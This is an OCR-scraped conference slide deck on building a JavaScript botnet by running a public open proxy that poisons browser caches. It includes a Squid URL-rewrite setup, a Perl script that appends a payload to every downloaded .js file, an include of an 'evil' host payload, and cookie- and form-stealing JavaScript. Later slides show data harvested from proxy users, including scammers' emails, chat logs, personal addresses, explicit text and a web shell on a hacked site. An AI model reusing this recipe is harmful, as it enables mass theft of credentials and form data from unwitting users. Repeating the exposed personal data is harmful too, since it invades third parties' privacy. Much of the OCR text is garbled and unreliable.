Owning "bad" guys {and mafia} with Javascript botnets Chema Alonso & Manu "The Sur" Informatica www.iriformatica64.coni Let's do a botnet but We are lazy We haven't money We haven't Oday We aren't the FBI We aren't either: Google • Apple Microsoft Informatica www.iriformatica64.com Let them to be infected Informatica www.informatica64.coml 64 Man in the Middle schemas ■ Evil FOCA - 0.1.0.0 File Jr* Configuration ^ About Network B -^JV Neighbors B - » 001 E3CB38B D F Pwned! Network ARP Spoofing Rogue DHCP(6) ICMPv6 Sppofing • SLAAC Attacks DNS Spoofing • • • Evil FOCA Rulez! I Informatica 64 www . I nfo rmattca 64. co m J Start Attack type DNSHijacking Neighbored vertiseme . . Domain: * Resolve as: 1.2.3.4 Target 1 : feSO: :e 1 03f 04e :d799:621 1 (8) Target 2: fe80: :2c52:55S4: 1 a2b f 6ab l3) Spoofs: 56 Active □ 3 3 ► Time Module Message 17: 17 NeighborSpoofing NewneighbordetectedwithOOl B33560AS3 as physical address 17:17 NeighborSpoofing Performing a MITM (Neighbor spoofing} attack between feS0::e103f04e:d799:621 1 and feS0::2c5... 17: 13 Network Discovery Sending neighbor discovery packets 17: 19 Network Discovery Sending neighbor discovery packets 17:20 Network Discover/ Sending neighbor discover/ packets 17:21 Network Discovery Sending neighbor discovery packets 17:22 Network Discovery Sending neighbor discovery packets □ nrormatica www.informatica64.coml Man in the Browser Plugins BHO Addons Access to all data Passwords • Code Banking trojans "A russian in my IE" j XML_Troyano_Banco,xml: Bloc de notas Archive Edicion Form a to Ver Ayuda f " what=" ATM P I N< / LAB E L > I j Informatica www.iriformatica64.coni JavaScript in the Middle • Poisoning Browser cache • No permanent • Deleting cache means infection cleaned Cached content is used if not expired • Allows attackers to inject remote javascript • Access to: Cookies Not HTTPOnly (more or less) • HTML Code Form fields • URLs Code execution • • • Informatica www.iriformatica64.conH Google Analytics js &malware Trojan JS/Redirector.G A (?) Encyclopedia entry Published: Sep 30, 2010 Aliases Not available Alert Level (?) Severe Antimalware protection details Microsoft recommends that you download the latest definitions to get protected. Detection initially created: Definition: 1.91.391.0 Released: Sep 30, 2010 Informatica www.iriformatica64.conH How to inject JavaScript code Persistent XSS • Owning HTTP Servers Network Man In the middle attacks WiFi • ARP Spoofing IPv6 Memcache attacks • Imagination Informatica www.iriformatica64.coni - Framework to own bowser's cache - Inject a javascript in each client - That javaScript loads payloads from C&C - http://beefproject.com - Very Well-Known Informatica www.iriformatica64.coni How to create a JavaScript Botnet from the scratch Informatica www.iriformatica64.coni TOR Nodes Informatica www.iriformatica64.coni TOR Nodes Guardar Todo Guardar la seleccion Copiar Seleccionar Todos Buscar Borrar Preferencias Avuda Cerrar Advanced >■ Horn Tipo Mensaje A octoen 14:03.171 Notice Opening Directory listener on 0.0.0.0:9030 octoe 11 14:03.171 Notice Opening Socks listener on 127.0.0.1:9050 oct 06 11 14:03.171 Notice Opening Control listener on 127.0.0.1:9051 oct 06 11 14:03.282 Notice Parsing GEOIP file. oct 06 11 14:23.108 Notice Have tried resolving or connecting to address '[scrubbed]' at 3 different places. Giving up. oct 06 11 15:18,772 Notice Interrupt: will shut down in 30 seconds, Interrupt again to exit now, oct 06 11 15:44.105 Notice Tor vO. 2. 1.26, This is experimental software. Do not rely on it for strong anonymity, (Running on Very recent version of Windows [major=6,minor=l] [workstation] {terminal services, singl... oct 06 11 15:44.105 Notice Initialized libevent version 1.4. 12-stable using method Win32. Good. oct 06 11 15:44.105 Notice Opening OR listener on 0.0.0.0:443 oct 06 11 15:44.106 Notice Opening Directory listener on 0.0.0.0:9030 oct 06 11 15:44.106 Notice Opening Socks listener on 127.0.0.1:9050 oct 06 11 15:44.106 Notice Opening Control listener on 127.0.0.1:9051 oct 06 11 15:52,810 Notice Guessed our IP address as 62,82.159.150 (source: 208.83.223.34). oct 06 11 15:54.166 Notice Bootstrapped 90%: Establishing a Tor circuit. oct 0-5 11 15:55,524 Notice Tor has successfully opened a circuit. Looks like client functionality isworking. oct 06 11 15:55,525 Notice Bootstrapped 100%: Done. oct 06 11 15:55,548 Notice Now checking whether ORPort 62 .82 .159 .150:443 and DirPort 62.82.159.150:9030 are reachable... (this may take up to 20 minutes -- look for log messages indicating success] oct 06 11 16:08,172 Notice oct 06 11 18:45,643 Notice i'r cur DN!i? provider gave an answer for "du. invalid",, which is not supposed to exist. Apparently they are hijacking Dl < J - = '...;==:. Tryina to correct for this. We've noticed 1 possibly bad addr... oct 06 11 18:45,683 Notice Your DNS provider has given "192.168.1.101" as an answer for 11 different invalid addresses. Apparently they are hijacking DNS failures. I'll try to correct for this by treating future occurren... oct 06 11 19:15,659 Notice Your DNS provider tried to redirect "www.yahoo.com" to a junk address. It has done this with 3 test addresses so far. I'm going to stop being an exit node for now, since our DNS seems so... oct 06 11 29:17.827 Notice Your DNS provider gave an answer for "Ippwspkk, invalid", which is not supposed to exist. Apparently they are hijacking DNS failures. Trying to correct for this, We've noticed 1 possibly b,.. oct 06 11 29:17.893 Notice Your DNS provider has given "192,168.1.101" as an answer for 11 different invalid addre^es. Apparently they are hijacking DNS failures. I'll try to correct for this by treating future occurren... oct 06 11 29:38.245 Notice Have tried resolving or connecting to address '[scrubbed]' at 3 different place:. Giving up. oct 06 11 35:52.059 Warning Your server (62.82.159.150:443] has not managed to confirm that its ORPort is reachable. Please check your firewalls, ports, address, /etc/hosts file, etc. oct 06 11 35:52.071 Warning Your server (62.82.159.150:9030] hasnot managed to confirm that its DirPort is reachable. Please check your firewalls, ports, address, /etc/hosts file, etc. Informatica www.iriformatica64.com Not a Rocket Scince.... Informatica www.iriformatica64.coni Buy a bullet-Prof Not: The Pirate Bay Amazon • (Remenber Wikilea Megaupload Informatica www.iriformatica64.coni Configure SQUIE GET /HTTP/1.1 Host: www.web.com Response Home.html GET /a.jsp HTTP/1.1 Host: www.web.com Proxy GET /HTTP/1.1 Host: www.web.com < Response Home.html GET /a.jsp HTTP/1.1 Host: www.web.com < M Chrome W... Gmail Busqueda ... ^ chrome m sv \ s n Cerrado recientemente Response a.Jsp + pasarela.js include http://evil/payload.js GET /payload.js HTTP/1.1 Host: evil Informatica www.informatica64.coml 64 Configure SQUID Proxy Squid. conf: Activate URL rewrite program # By default f a URL re writer is not used. - # Default : # none url rewrite program /etc/squid/poison .pi .htaccess: Apache No Expiration Policy :/etc/squid# cat /var/ www/ trap/ .htaccess ExpiresActive On ExpiresDef ault "access plus 3000 days" :/etc/squid# Informatica www.iriformatica64.com Infect all JavaScript files # ■ /usr/bin/perl while (<>} { chomp $_; if ($_ =- /{. *\.js}/i> { Surl = Si; system( "/usr/bin/wget " f ,r -g/ r , "-O", "/var/www/ trap/ $pid-$ count . js", "$url"} ; system ( "chraod o+r /var/ww/ trap/ Spid-S count . j s " } ; system ( "cat /etc/sguid/pasarela. js » / var /www/ trap/ Spid-S count . js"} ; print w http : //127 .0.0.1: 80/tmp/Spid-Scount . j s\n" ; > else { print "$_\n"; > $ count ++; Informatica www.iriformatica64.coml Infect all JavaScript files function payload() { x = doc jir.ent . getElerr.erLtByld ( pr poisorLpayload pr ) ; if [x = null) { docoir.ent .write ( n ■); do concent ■ write ( pr pr ) ; > > payload ( } ; Informatica www.iriformatica64.cond Publish your Proxy XRO^Y.COM ^ more than just proxy Proxy Solutions Home Premium Proxy Proxy List UK | Favourite By country By port Add new Remove Add an Open Proxy to the Database. You are more than welcome to add your proxies in our database! Your submission will be verified to check whether or not your proxies are open for public use, and only hosts which are current open HTTP proxies will be added to our database. The check process is not immediate - it may take hours before your proxy is listed in the full proxy list. Our site is not an online proxy checker. You will receive no feedback as to whether or not proxies in your submittion are valid HTTP proxies. However submitting quality proxylists you can get an elite user status which gives you special level access to our database and Xorum. GET YDUR PROXY FRFH D AH RIAL 1 } +? RSS feed DB dump User: Anonymous [Log in] [Register/ Why Join?] A^Iware Capacity Flapping ^^AX^t.cojriPimffljig Model Available VM Capacity with Capacity Manager. Free 30-Day Trial AdChoices \j> Informatica www.iriformatica64.coni Let Internet do the magic proxy BU5C|Ueda ^proximadan^ Todo Imagenes Maps Videos Noticias Shopping Whois Info www.xroxy.com/whois1902391.htm - Traducir esta pagma 13 Feb 2012 - Xroxy proxy lists, xorum forums, and we b proxy ser vice Paid Proxy ... can find Whois Information for the following IP address: fl ft4 - Si mole Proxv List - IP Info www simple proxy 1 1 st com/info. php?.. (nvd/y) Status Offline Country Germany City: ? Last online: Fri Feb 24 ... Informatica www.informatica64.coml Do Payloads: Cookie stealing document.write(" "); Informatica www.iriformatica64.coni Do Payloads: Form fields stealing function JcLagStartf) vsr forir.s = psrent . docoir.ent . getElen.erits3yTsgNair.e ( pr forrr. rr ) ; for (i = ; i < forms . length; i++} { forms [ i ] . addEvent Lis t ener ( 1 siibir.it 1 f function ( ) ■[ var cadens = ri M ; var forir.s = parent . docuir.ent . getElen.erLtsByTagNair.e ( rr forrr. pr ) ; for (x = ; x < forms . length; x++} { v-= r elements = forms [x] . elements; for (e = ; e < elements . length; e++} { cadena 4= elements [e] .name + "%3d pr + elements [e] .value + } } sttachForir. (cadena) ; }, false); } ■ Informatica www.iriformatica64.co Informatica www.iriformatica64.coni Who •"$"•$ is using this kind of services? Informatica www.iriformatica64.coni Mafias: Help the Prince AGENT-X COMICS ^ WWW.ACENT-X.COM AU Informatica www.iriformatica64.coni Mafias: Nigerian Scammers 5jjQil.com _jRe: FOR YOUR KIND X £l rQyalhotelengland@hotmail.co.uk §3 Mail Collector L_j Spam Lj Drafts (1) 4_j Sent (3) _J Trash Q Saved I Ms , More Actions T Subject Date Size □ 4 1 wasim butt94@vahoo.com FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 12/ 2 0/11 104 KE □ Bikash Thapa SEND THIS APPLICATION Lb 1 1 bR TO ZONAL COORDINATORS 12/15/11 3 KE □ Bikash Thapa FROM BRITISH IMMIGRATION LAWYbR'S BOARD OF DIRbCTORS 12/15/11 36 KE □ meena anam THIS IS HOW YOU WILL SEND APPLICATION LETTER TO ZONAL COORDINATORS 12/15/11 3 KE □ meena anam FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 12/15/11 36 KE □ 4 t harish.badhan@vahoo.com FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 12/10/11 100 KE □ t f yousaf_simba@hotmail.com FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 12/03/11 103 -"' B □ naveed shahid SEND PAYMENT NOW SO WE WILL SEND YOUR WORK PERMIT CERT IMMEDIATELY FROM ... 12/01/11 KE □ £ t naveed_shahid97@yahoo.com FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 11/23/11 104 KE □ i ; (r saima_ahsan20@hotmail.com FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 10/08/11 103 KB □ | i amirbba715@gmail.com FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 09/22/11 104 KE □ 4 r » wa si m_butt9 4-@yahoo.com FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 09/20/11 103 KE □ MUHAMMAD YASIR GENTLY UNDERSTAND THAT WE CAN NOT PROCESS YOUR REQUEST WITHOUT 195 FEE 09/19/11 2 KE □ _ r » MUHAMMAD YASIR FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 09/19/11 102 <5 □ asghar shahid GENTLY UNDERSTAND THAT WE CAN NOT PROCESS YOUR REQUEST WITHOUT 195 FEE P... 09/16/11 2 KE □ i f » thiruc20@gmail.com FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 09/16/11 102 •-" B □ | r » asghar shahid FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 09/11/11 101 KE □ 4 f englandroyalyorkhotel@yahoo.... Fw: FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 09/11/11 103 KE □ _ i » subukshakir@hotmail.com FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 09/06/11 101 KE □ | dharam.verma25@gmail.com FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 09/03/11 101 KE Informatica www.iriformatica64.com Mafias: Nigerian Scammers fjf mail.com Home y_jSent (3/48) l^J Re: FOR YOUR KIND x J ^ FROM BRITISH IMMI I xN Forward Resend Delete Lj Move To T ^ More Actions. T UK Immigration Work Permit and Visa Services Our Duty is to provide you with a working permit from the UKBA and your firm suporting documents. ENTRANCE WORK PERMIT as requested by the immigration department to enable your completement required documents and possible approval entry visa to be issued at the British high commissioner in your country ,you are required to reach us with your passport scanning pages, with two passport photograph EU size along with your processing fee of GB £275 Pounds before we could issue of your ENTRANCE CLEARANCE WORK PERMIT from our office. On receipt of these:- (a) Your passport scanning pages, (b) Two passport recent photographs (c) Filled candidate payment form with processing fee of GB £275 pounds We will to assist to forward all your details to British LABOUR DEPARTMENT for processing of your entry working permit certificate as requested by the immigration department which will guarantee the issuance of your four 4 -years entry working visa at the British embassy in your country of residence . As soon as we received from you , your request will be process and issued within 43-HRS; This are generally mentioned in the prospectus of the Employment/Tourist tour or invitation by any UK company management for r and immediately your documents is approved admission in that particular institute will qualify him or her for entrance clearance entry working permit . INFORMATION METHOD OF PAYMENT You should reach us with your payment through the means western union money transfer or money -gram money transfer bank and print out the candidate payment form to fill with the payment transfer informations from the western union , scan and send back to our office with:- (i) Passport scanning pages r (ii) Two recent passport photographs along with the (Mi) Filled candidate payment form for processing and issuing of your entrance clearance work permit labour from our office .Attached file is contained your application candidate payment form for entry clearance work permit certificate and make payment through the western union money transfer to Accountant Receiver Name: (Mr Addison Stuart) Address: 30-83 Long Lane,EClA 9ET London U.K Then print out the candidate payment form to fill, scan and send your passport scanned pages along with two passport photographs for immediate processing and issuing of your request from our office within -43 Hours Informatica www.iriformatica64.com Mafias: Nigerian Scammers £j mail.com Home f |£j]Seiit (3/48) QRe: FOR YOUR KIND X <£$ Check Mail \$i Reply T L^J Forward © Spam [g| Delete L_ l Re: FOR YOUR KIND ATTENTION^ khem raj puri I Close fullscreen, j Re: FOR YOUR KIND ATTENTION "khem raj puri" -=krajpuri@yahoo.com> j^j 09/01/11 06:47 AM □ Less info » 4* ffi To: britishlawyersworkpmt@englandmail.com Dear Sir I respected your kindly information for me about that job. But at that time my group clients are not to beleive me for deposite that amount. So after given to the clearance paper then they are possible and beleive to payment for me. We can not send you money through Western or Bank : Because our government can not give us to permission. If you are agree then only one way to send that amount in our Nepalase UK Embassy through your hand. Otherwise it is not possible to do for further processed then relase the task. Thanking about me Regards Khem Raj Puri Informatica www.iriformatica64.coni Mafias: Nigerian Scammers Informatica www.iriformatica64.coni Mafias: Nigerian Scammers m Picturel327.jpg Picture.jpg Picturel323.jpg ±AAA AA A iAAAAl "Jfe ■■-•■r#--V- «k--l 9J* AAAAAiAAAAAAAA AAA* A ROYAL YO RK H OTEL RECOMM EN DAT10 N JOB OFFER ACCEPTANCE SLIP.JPG Informatica www.informatica64.coml Mafias: Predators meeta where singles meet home search updates account logout i] | EH Messages v Matches v £ Members v ^ Groups v ^ Forums v <3 Home travelgirls Friends Axionqueen Age: early 30's Location: Keller, Texas Gender: female Looking for: dating / a relationship Interested in: men Member since: 3 months ago Relationship status: Single Hair color: Black Eye color: Brown Religion: christian Ethnicity: a si a Occupation: baby sitter Wants children? Depends on what partner wants About Axionqueen AM LOOKING FOR A VERY STRAIGHT FORWARD AND WELL UNDERSTAND MAN TO BE MY SOUL MATE AND HE AS TO BE VERY HARD WORKING AND READY FOR A LONG TIME RELATIONSHIP WITH ME AND ALSO HAVE A GOOD HIGH SEX DRIVE AND HE AS TO BE DISEASE FREE AND VERY CLEAN AND VERY HONEST, LOVING, CARING, DOMINANT, PASSIONATE AND BE A MAN OF IS WORDS AND READY TO TRY NEW THINGS WITH ME AND LOVE EATING MY PUSSY AND TAKING ME FROM THE ASS ALWAYS AND ALSO LET ME HAVE THE LAST DROP OF IS CUM IN MY MOUTH FOR MY OWN GREAT DESIRED Informatica www.iriformatica64.coni Mafias: Predators HaveAFling Frnd your Kiwi Fling :) Messages Profile Settings Credits Logout Search: Age Send Message | F1 1 | Advanced Search (X Axionqueen Single seeking males for serious relationships then marriage Lives in Auckland, New Zealand Rec&nt Activities Age Gender Zodiac Sign Self Introduction Languages Spoken Weight Height Last login 22 min ago 31 Female Aries AM AVERY COOL HEADED AND EASY GOING LADY AND AM CARING, LOVING, OPEN MIND ED , H N E ST, PAS S 1 NATE , HARD WORKING AND AM DOWN TO HEART PERSON AND I HATE CHEATING OR LIES AND AM WHO I CALL MY SELF.I LIKE COOKING AND GETTING MY ENVIRONMENT CLEAN ALWAYS AND I LIKE GOING SHOPPING, CAMPING, SWIMMING.FISHING AND AM English 60 kg - Average/Medium 174 cm [5" 3") Informatica www.iriformatica64.co Mafias: Predators Home | Top Charts | Search | Who's Online? | Interested in you Profile | Mailbox | Favorites | You're interested in.. | Invite a friend Translator PlanetaLove USA Ycur profile has been viewed 1 times 5 people interested in you? Average rating: 10,00 (I votes) There are 42 new users! There is 2 online users! 4 j ri r \ i i USER PROFILE Username: axionqueen Age: 31 Gender: Female Location: Lynchburg, Virginia, United States Looking for a man between: 39 and 60 years Last Online: online now Average Rating: 10.00(1 votes) Welcome axionqueen | Logout Attractive, Pretty, Sexy, Sensual, Affectionate I like: Stay with my family, Helping people, Walking, Dancing, Reading I'm looking for: A special man, Love, A man who Informatica www.informatica64.coml 64 Mafias: Predators ® 0,49 status ^ joyandreas32 V @ Ubersicht - Profi 1 Q Mailbox lB> Freunde "J Mail verfassen Suche D Freunde online ^ m 42 Ttiorsten Sorry aber ich weifi n#c_ Freunde '.verb en Profil Verlauf Details 1 Freund Gruppen Foto Ticker Gastebuch Informatica www.iriformatica64.coni Mafias: Predators kkbill1980(12:09:40 (UTC}):Hello sweetie fiat176punto(12:12:49 (UTC)):Hello my sweet Mous kkbill 1 980(12:1 3:00 (UTC)):how are you doinf sweetie fiat176punto(12:13:16 (UTC)):doinf ??? kkbill 1980(12:1 3:52 (UTC)):what am fine i just came back from the booking office and my love when did you really want me to come fiat 1 76punto(12: 1 5:38 (UTC)):I want it that You come to me fiat176punto(12:15:51 (UTC)):why what is the Problem kkbill 1980(12:16:03 (UTC)):when did u want me to come next week or what ? fiat176punto(12:16:48 (UTC)):I dont now what is the best about you kkbill 1980(1 2:17:08 (UTC)):no problem am just asking to know the date i will choose to book the flight ticket and all i need to get all my papers with the flight ticket book it will cost me 700euro fiat176punto(12:17:11 (UTC)):when is the best Day for Fly kkbill 1980(12: 17:34 (UTC)):am ready to fly anytime so far you are ready to have me with you my love fiat176punto('12:18:33 (UTC)):Year thats fine so I thing you can look for Wendsday fiat176punto(12:19:11 (UTC)):When its no Problem for you kkbill1980(12:20:16 (UTC}):okay that is good fiat176punto(12:20:21 (UTC)}: Baby You have my Address now kkbill 1 980(12:20:54 (UTC)):and when did you think you can get the 700euro send so that i can make the booking and get everything ready for me to fly down to germany fiat176punto(12:22:05 (UTC)}:Baby You have my Address now fiat176punto(12:22:15 (UTC)):??? kkbilH 980(12:22: 1 8 (UTC)):i will send you the full nicked pics tonight fiat176punto(12:23:11 (UTC)):oh Baby this is nice kkbill 1980(12:23:16 (UTC)):when did you think you will have chance to go and send me the 700euro for the booking so that i will get everything ready fiat176punto(12:24:57 (UTC)):The pictures are so tht I can see your all Pircings ??? kkbi 111980(12:25:18 (UTC)):i will send you my full information so that you can use it to send the money from western union to me okay fiat176punto(12:25:49 (UTC)):yes Baby when You sen the Pic You can send me were I must Take the Money kkbill 1 980(12:26:1 6 (UTC)):sorry i dont understand you my love fiat176punto(12:27:17 (UTC)):When You send The Pictures to night You can sent me the Western Union Information kkbi 111980(12:27:58 (UTC)):ich frage Sie, dass, wenn Sie Zeit haben, urn zu gehen und senden Sie mir die 700 €, so dass ich die Buchung kann tun und alles bereit kkbill1980(12:30:15 (UTC)):are you there Informatica www.iriformatica64.coni Mafias: Predators Contacts Calendar Notepad What's Hew? - Mobile Mail - Options ^ Check Mail New - Q western union Mail Search Get the newest Yahoo! Mail Refine Results Sender curtisgipson96 (35) achim-dudziak-1962@hotma Kayla Bill (13) Andreas Kochling (11) fiatl76punto (9) > View all 31 senders Folders @C@ Chats [129) Sent (13) Inbox (11) Dates 2012 (81) 2011 (97) Message Status Read (153) I Infhnnarl M PTl Search Results 1 -25 of 1 53 messages for western union |__"] Message View | L3 Photo View | #J Attachment View First | Previous | Nex± | Last D e I e^^^^^^^^^^J Move... ▼ From H • Kayla Bill ...and what and look for heart --- On Kayla Bill ...and what and look for heart — On □ 4^ Josef Landhuis ...and what and look for Re: Schatz I love you big Kiss is your bank manager with sending money if you are truthful a western union shop to send it or you just forget about it Wed. 2/29/12. Josef Landhuis... 9:27 PM collect the money from your bank and stop playing game with my Re: is your bank manager with sending money if you are truthful a western union shop to send it or you just forget about it Wed, 2/29/12. Josef Landhuis... [ No Subject ] is your bank manager with sending money if you are truthful a western union shop to send it or you just forget about it 9:20 PM Sent collect the money from your bank and stop playing game with my 4:29 PM Inbox collect the money from your bank and stop playing game with my Informatica www.informatica64.coml Mafias: Predators Von: Kayla Bill Betreff: Re: Schatz I lo ve you big Kiss An: "Josef Landhuis" ^^^H^MMP^^^Hfe"- Datum: Donnerstag, 23. Februar, 2012 07:10 Uhr Hello sweetie why you have not sent me the nicked pics you promise me ?and i just sent you my nicked pics and please dont show it to another person is for only your eyes okay i love you and i will be waiting to chat with you when you come online today i miss you and last night my net was bad that is why i did not come online last night and i have also send you my info for the western union From: Josef Landhuis Date: Wednesday, February 29, 2012, 4:05 AM hello Baby I dont no but but my Bankmanager ask me that the Address City and country is not pasibel now what we can do ??? gime a athoer one please Your love Josef big Kiss Baby Von: Kayla Bill Betreff: Re: Schatz I lovj An: "Josef Landhuis" Datum: Mittwoch, 29. Februar, 2012 14:43 Uhr fuck it stop playing game on me i gave you my right address and what is your bank manager with sending money if you are truthful collect the money from your bank and look for a western union shop to send it or you just forget about it and stop playing game with my heart Informatica www.informatica64.coml 64 g Scammers My Ads View All \ KTV3111403Charrning Registered Yorkshire ... $200.00 Start: 2/29/2012 Exp: 3/30/20 12Active [> Online Preview @f Edit Details @ Edit Photos j O EditUpsells Renew % Close (§] Clone \ 3] ALA31 1 1330Charming Registered Yorkshire ... $200.00 Start: 2/29/2012: Exp: 3/3 0/201 Motive [> Online Preview g Edit Details @ Edit Photos O EditUpsells ^ Renew Close| (§] Clone [5] ALA8111363Charmirig Registered Yorkshire ... $200.00 Start: 2/29/2012 Exp: 3/3 0/201 Motive [> Online Preuiew Edit Details @ Edit Photos j O EditUpsells; Renew Close (§] Clone @ ALA8 1 1 1 332Charming Registered Yorkshire ... $200.00 Start: 2/29/2012 Exp: 3/3 0/20 12Active [> Online Preuiew (If Edit Details @ Edit Photos [2j EditUpsells • ... ... ... .. .. j ■V Renew I % Close I @] Clone @ NJC81 1 1331 Ch arming Registered Yorkshire ... $200.00 Start: 2/29/2012 Exp: 3/30/20 12Active [> Online Preuiew 0" Edit Details @ Edit Photos \ [J] EditUpsells! '. _ J Renew ^ Close @] Clone Informatica www.iriformatica64.coni Warning! This picture could hurt your emotions... Informatica www.iriformatica64.com Dog Scammers Category: For Sale - Free Stuff, Freebies, & Bargains Views: 7 Start Date: 2/29/2012 Price: $200.00 Find Similar Listings Free Stuff, Freebies, Si Bargains Go! ^ Create Alert Meet the Advertiser h e:lp! Ask Advertiser a Question View More from this Advertiser Feedback: jessicabrownl2 Other Options Watch This Ad Clip This Ad / View Clip List Email to a Friend Report As Inappropriate H ShareThis *j Informatica www.iriformatica64.com Psychotics 1 90 .90 .26. 1 69 vkJeo.xnxx. co m k= M other =Ssarch 1 90 .90 .26. 1 69 video, wuoe. co m k= Rape sister =Search 1 90 .90 .26. 1 69 w w w xnxx - CD m k= Violent rape =Search 1 90 .90 .26. 1 59 '"' id eDxnxx - CD m k-Violence =Search comment= = Sutmit Informatica www.iriformatica64.coni Annonymous [-] w h atisrny ipadd ress. cd m 7 f o rms 13E.37.2?-.?G hideme.ru sa= Search server[2]=rand ip[2]=rand url[3]=http:// name[3]=Ta5aai&a ijaeeaaee server[3]=rand ip[3]=rand ur[4]=http:// name[4Ha£aaiea ijaeeaaee ser. r er[4]=rand ip[4]=rand fvm=1 fvm=2 fvm=3 D =lmSaaebu eta q=nene ikto ria .d ju @y a nd ex. ru Informatica www.iriformatica64.coni Annonymous |Comains pf zombie 1 |domain list of fl.26.64.35 [+]| [-] 2ip.ru [ + ] 1 H anunturi.telegrafDnline.ro [ + ] 1 H facebDDk.com url cookie 1 1 LLp.PP 1 1 ■ I I I . I U ■_■ ■_■ l_i ■_■ U IT. ■_■ ■_• 1 1 If |_i IU y ll 1 l3i 1 1 P. '-i UT j l . p 1 I p '--I 1 U 1 1 1 1 ■-■ 1 1 1 LLp u .11 u static, a k. fbcd n . n et/co n n ect/xd_proxy. ph p? versio n =3#cb=M 31 b538S5B9B22&o rig in = http%3A^2F%2F w w w . relo ad.. It% t 2Ff3fdf3EEa91c39airelation=parent.parent&transport=postmessage ^ [+] | [-] whatismyipaddress.com [+] | [-] w o rkJ . n eed f o rspeed . co m [+] | [-] www.youtube.com Informatica www.iriformatica64.coni Rare people in a rare World Account Refer A Friend Affiliate Program Referral Report Account Details Balance Redeem Your cu rren t balan ce represen ts how active you r i n volvemen tin ourservice has been up to now. Su mmary stated below. ■ Since joining up, you h ave accu mulated a total of $24.38 ■ You have not redeemed yet ■ You do not qualify for redemption yet due to insufficient balance Displaying ! to 20 of 383 articles on page 1 of 20 £2i i « £± 1, Culinary Traditions Of France Gourmet S0.05 2/29/2012 1:42:42 PM 2/29/2012 1:43:41 PM 2/29/2012 1:44:22 PM Why Network Marketing Sucks Networking S0.05 2/29/2012 1:41:46 PM 2/29/2012 1:42:41 PM 2/29/2012 1:43:25 PM Black Christmas movie review- Movies S0.06 2/29/2012 1:40:20 PM 2/29/2012 1:41:45 PM 2/29/2012 1:42:25 PM Cultivate a Positive Mind -Set Through Meditation Meditation 50.05 2/29/2012 1:40:05 PM 2/29/2012 1:40:20 PM 2/29/2012 1:41:41 PM 5 Tips To Help You Master Digital Photography Photography SO. 04 2/29/2012 1:30:37 PM 2/29/2012 1:39:34 PM 2/29/2012 1:39:56 PM Modern hand Analysis : What's In It For us? Spirituality SO. 05 2/29/2012 1:37:40 PM 2/29/2012 1:30:36 PM 2/29/2012 1:39:31 PM Methods for photo backups Photography S0.05 2/29/2012 1:36:47 PM 2/29/2012 1:37:40 PM 2/29/2012 1:30:30 PM Soothing Music: The Native American Flute Music SO. 04 2/29/2012 1:36:05 PM 2/29/2012 1:36:40 PM 2/29/2012 1:37:27 PM What does it mean to be an expatriate? Part 2 - How to choose your paradise Coaching S0.05 2/29/2012 1:35:39 PM 2/29/2012 1:36:05 PM 2/29/2012 1:36:42 PM Diabetes Epidemic because of self-inflicted Obesity Diabetes S0.06 2/29/2012 1:35:12 PM 2/29/2012 1:35:30 PM 2/29/2012 1:36:01 PM The Poor Man's Guide To Rich Looking Videos Marketing SO. 07 2/29/2012 1:34:56 PM 2/29/2012 1:35:11 PM 2/29/2012 1:35:35 PM World s Hottest Hot Sauce - Blair's 16 Million Reserve Food and Beverage S0.05 2/29/2012 1:34:14 PM 2/29/2012 1:34:56 PM 2/29/2012 1:35:00 PM Informatica www.iriformatica64.com HaxOrs and defacers.... H 73 1 63 27 1 70 www .trend w p. co m actiDn= newdirname= d ir=/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css newperm= pfile= d ir=/h d me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/css sname= tofite= d ir=/h d me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css okiname= newfilename= d ir=/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css action= opfile= dir= view_writable=0 d ir=/h o me/trend/pu blic_html/, =Grt uploadflle= doupfile=Yukle uploaddir=./ dr=V action=file theflle= doing= d ir=/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/css/E d l[/h d me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css/E d l[/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css/E d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/css/E d l[/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css/c d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/css/e d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/css/e d l[/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css/)! d l[/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css/j< d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/cssA d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/cssA ch kail - on Informatica www.iriformatica64.com ...hacking... Q Hacked BySkyNet <- CO www.trendwp.corn * <* ^ A| Esta pagina esta escrita en turco t iQuierestrad. Traducir No Configuration ▼ Sitede BuLmau B'^'^a T e malar %25 Itidirim ile SatiLmaktadir. Boyle Para Gozlere IoaumayitiLZ. 3 5 Kuril si uk Tern La rat Verdigi Fiyata Bakia Gelin Sizlere bakki Neyse O Sekilde Verio ve O Lis an Her T^rl" 1 So run da Hizmeriuizdeviz. ILetisim Icin: By_BaRaK@Hotmail.De Informatica www.iriformatica64.coni . . and hacked ; O SkyNet I Casus Shell GO wwwtrendwp.com/demo/trendhaber/wp-includes/css/casus.php Sa] Esta pagina esta escrita en turco ^ iQuieres traducirla? Traducir No Configuracion ▼ www.trendY/p.com (77.223.130.22) Cikis I 